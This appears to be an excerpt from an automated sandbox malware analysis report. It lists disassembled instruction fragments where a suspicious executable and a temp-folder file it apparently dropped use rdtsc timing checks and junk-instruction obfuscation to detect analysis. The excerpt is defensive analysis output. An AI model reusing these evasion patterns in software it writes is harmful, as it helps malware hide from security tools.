Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E209E7 second address: 4E20ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8869h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F8854FD8863h 0x00000012 jmp 00007F8854FD8863h 0x00000017 popfd 0x00000018 pop esi 0x00000019 call 00007F8854FD8869h 0x0000001e jmp 00007F8854FD8860h 0x00000023 pop eax 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 mov bl, 6Ah 0x0000002a mov si, 710Fh 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 mov cx, 7307h 0x00000035 pushfd 0x00000036 jmp 00007F8854FD885Ch 0x0000003b sub eax, 65FB1AB8h 0x00000041 jmp 00007F8854FD885Bh 0x00000046 popfd 0x00000047 popad 0x00000048 push eax 0x00000049 jmp 00007F8854FD8869h 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 pushad 0x00000051 movzx esi, di 0x00000054 mov dx, D23Ah 0x00000058 popad 0x00000059 mov dx, D806h 0x0000005d popad 0x0000005e mov esi, dword ptr [ebp+0Ch] 0x00000061 pushad 0x00000062 mov cx, dx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20ABE second address: 4E20B14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test esi, esi 0x0000000c pushad 0x0000000d mov ecx, 15E42C43h 0x00000012 pushfd 0x00000013 jmp 00007F8854FAEB98h 0x00000018 adc esi, 2C406908h 0x0000001e jmp 00007F8854FAEB8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 je 00007F88C6ADC435h 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B14 second address: 4E20B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B18 second address: 4E20B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B33 second address: 4E20B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B38 second address: 4E20B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 1Eh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 jmp 00007F8854FAEB8Ch 0x00000015 je 00007F88C6AF44C9h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F8854FAEB8Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B68 second address: 4E20B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B6C second address: 4E20B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B72 second address: 4E20B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F8854FD8860h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20B9C second address: 4E20BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20BA0 second address: 4E20BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20BA6 second address: 4E20BC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20BC0 second address: 4E20BDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E20C51 second address: 4E20C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop esi 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31444F second address: 31447F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD8869h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8854FD885Eh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31334A second address: 313355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3136B4 second address: 3136BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31380B second address: 313845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 jmp 00007F8854FAEB8Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F8854FAEB93h 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 313845 second address: 31385E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8854FD8864h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31385E second address: 313869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 313869 second address: 31386D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3164D9 second address: 3164DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31665A second address: 31665F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31665F second address: 3166D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB8Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 1598FFF1h 0x00000013 mov dword ptr [ebp+122D3561h], ecx 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F8854FAEB88h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov esi, 1984C6A6h 0x0000003a mov di, cx 0x0000003d push 00000000h 0x0000003f mov dword ptr [ebp+122D3488h], ebx 0x00000045 mov dword ptr [ebp+122D3451h], esi 0x0000004b push 00000003h 0x0000004d mov edi, 3E02266Bh 0x00000052 push BFEA76BCh 0x00000057 pushad 0x00000058 jl 00007F8854FAEB88h 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3166D0 second address: 3166D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 316747 second address: 31674D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31674D second address: 3167A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jne 00007F8854FD885Ah 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F8854FD8858h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D18B8h], eax 0x00000037 call 00007F8854FD8859h 0x0000003c jmp 00007F8854FD885Bh 0x00000041 push eax 0x00000042 push edi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3167A7 second address: 3167F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB8Fh 0x00000009 popad 0x0000000a pop edi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F8854FAEB92h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 jmp 00007F8854FAEB99h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3167F1 second address: 31686A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F8854FD885Dh 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F8854FD8858h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov si, bx 0x0000002f push 00000003h 0x00000031 and edx, 2A1E57FFh 0x00000037 push 00000000h 0x00000039 jno 00007F8854FD8856h 0x0000003f push 00000003h 0x00000041 call 00007F8854FD8859h 0x00000046 jmp 00007F8854FD8866h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jo 00007F8854FD8858h 0x00000054 push ebx 0x00000055 pop ebx 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 31686A second address: 316870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 316870 second address: 316874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 316874 second address: 3168E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnl 00007F8854FAEB8Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F8854FAEB95h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push esi 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop esi 0x00000025 pushad 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c pop eax 0x0000002d mov edx, 7181E125h 0x00000032 lea ebx, dword ptr [ebp+1244B3F9h] 0x00000038 push ebx 0x00000039 mov dword ptr [ebp+122D34C3h], esi 0x0000003f pop esi 0x00000040 xchg eax, ebx 0x00000041 jbe 00007F8854FAEB92h 0x00000047 jo 00007F8854FAEB8Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3168E3 second address: 3168F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F8854FD885Ch 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338AF4 second address: 338AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338AF9 second address: 338B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336D2D second address: 336D37 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E7B second address: 336E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8854FD8856h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E85 second address: 336E8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E8F second address: 336E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336E95 second address: 336EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push esi 0x0000000c jo 00007F8854FAEB86h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 336EBD second address: 336ED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8865h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337171 second address: 33717B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375D5 second address: 3375DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375DA second address: 3375F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FAEB88h 0x00000008 jmp 00007F8854FAEB8Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375F7 second address: 3375FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3375FF second address: 33760B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33760B second address: 337610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337610 second address: 33762B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB92h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378A1 second address: 3378AB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8854FD8856h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378AB second address: 3378B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378B1 second address: 3378CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8865h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378CC second address: 3378D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3378D0 second address: 3378F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8854FD885Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F8854FD885Ch 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A4E second address: 337A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A55 second address: 337A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A5B second address: 337A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337A5F second address: 337A65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BD4 second address: 337BE1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BE1 second address: 337BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BE9 second address: 337BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8854FAEB86h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337BF7 second address: 337C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007F8854FD8856h 0x0000000e popad 0x0000000f jbe 00007F8854FD8865h 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 337C21 second address: 337C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33817C second address: 338182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3384B8 second address: 3384DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F8854FAEB92h 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3384DA second address: 3384DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 3384DE second address: 33850B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8854FAEB86h 0x00000008 jmp 00007F8854FAEB8Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F8854FAEB86h 0x00000017 jmp 00007F8854FAEB8Eh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 32B1AE second address: 32B1B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 32B1B4 second address: 32B1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8854FAEB91h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338954 second address: 338962 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FD8858h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 338962 second address: 338988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8854FAEB92h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F69 second address: 339F79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8854FD8856h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F79 second address: 339F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F7D second address: 339F8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 339F8F second address: 339FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FAEB98h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33E22E second address: 33E234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe RDTSC instruction interceptor: First address: 33D7C3 second address: 33D7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
